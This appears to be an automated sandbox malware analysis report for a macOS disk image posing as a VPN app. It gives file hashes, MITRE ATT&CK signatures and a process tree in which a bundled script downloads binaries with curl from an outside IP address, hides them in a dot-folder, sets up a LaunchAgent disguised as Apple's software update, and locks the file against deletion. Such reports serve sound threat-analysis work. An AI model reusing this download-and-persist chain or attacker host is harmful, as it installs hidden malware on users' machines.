Resubmissions

07-11-2024 18:36

241107-w9c14sxcjh 10

Analysis

  • max time kernel
    80s
  • max time network
    99s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241101-en
  • resource tags

    arch:amd64, arch:i386, image:macos-20241101-en, kernel:19b77a, locale:en-us, os:macos-10.15-amd64, system
  • submitted
    07-11-2024 18:36

General

  • Target

    Covid/vpn.dmg

  • Size

    1.2MB

  • MD5

    c31001dd6ab78d911243c0e29b0dbdd6

  • SHA1

    563d75660e839565e4bb1d91bc1236f5ec3c3da7

  • SHA256

    29bb22553c16b32057b30c240b30e2f4fe107d9ccfb6b2d0dbece6f41a2419d6

  • SHA512

    9bb41b94104051a667cd2abe0618b785d9a764518dc350a472e0c54f8c5fb3d33efd6d5239ad8307cf6870cc37a1ac113d8439c7d4bcd5aba18b92ef11bf3409

  • SSDEEP

    24576:WBEYQSJso6qMUTGr+rW5D3hl+5P9wAYntG954QoJm3qEUxGFMlpPX:/SJQUTjWB3hc5VNY89NoJcUx

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol (1 TTPs, 2 IoCs)

    Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel.

  • Launch Agent (1 TTPs)

    Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

  • Resource Forking (1 TTPs, 1 IoCs)

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Launchctl (1 TTPs, 2 IoCs)

    Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command line, interactively, or even redirected from standard input.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"open /Volumes/vpn/vpn.app\""
    1⤵ PID:513
  • /bin/bash
    sh -c "sudo /bin/zsh -c \"open /Volumes/vpn/vpn.app\""
    1⤵ PID:513
  • /usr/bin/sudo
    sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"
    1⤵ PID:513
    • /bin/zsh
      /bin/zsh -c "open /Volumes/vpn/vpn.app"
      2⤵ PID:514
    • /usr/bin/open
      open /Volumes/vpn/vpn.app
      2⤵ PID:514
  • /usr/libexec/xpcproxy
    xpcproxy com.apple.softwareupdate.2324
    1⤵ PID:515
  • /Volumes/vpn/vpn.app/Contents/MacOS/vpn
    /Volumes/vpn/vpn.app/Contents/MacOS/vpn
    1⤵ PID:515
  • /bin/bash
    /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script
    1⤵ PID:518
    • /usr/bin/uname
      uname -m
      2⤵ PID:519
    • /bin/mkdir
      mkdir /Users/run/.androids
      2⤵ PID:520
    • /usr/bin/curl
      curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated
      2⤵ PID:521
    • /bin/chmod
      chmod a+x /Users/run/.androids/softwareupdated
      2⤵ PID:534
    • /bin/chmod
      chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
      2⤵ PID:535
    • /bin/launchctl
      launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
      2⤵ PID:536
    • /bin/launchctl
      launchctl start softwareupdated
      2⤵ PID:538
    • /Users/run/.androids/softwareupdated
      /Users/run/.androids/softwareupdated
      2⤵ PID:539
    • /usr/bin/chflags
      chflags uchg /Users/run/.androids/softwareupdated
      2⤵ PID:540
    • /usr/bin/curl
      curl -L http://46.137.201.254/covid -o /Users/run/covid
      2⤵ PID:541
  • /usr/libexec/xpcproxy
    xpcproxy softwareupdated
    1⤵ PID:537
  • /Users/run/.androids/softwareupdated
    /Users/run/.androids/softwareupdated -D
    1⤵ PID:537

Network

MITRE ATT&CK Enterprise v15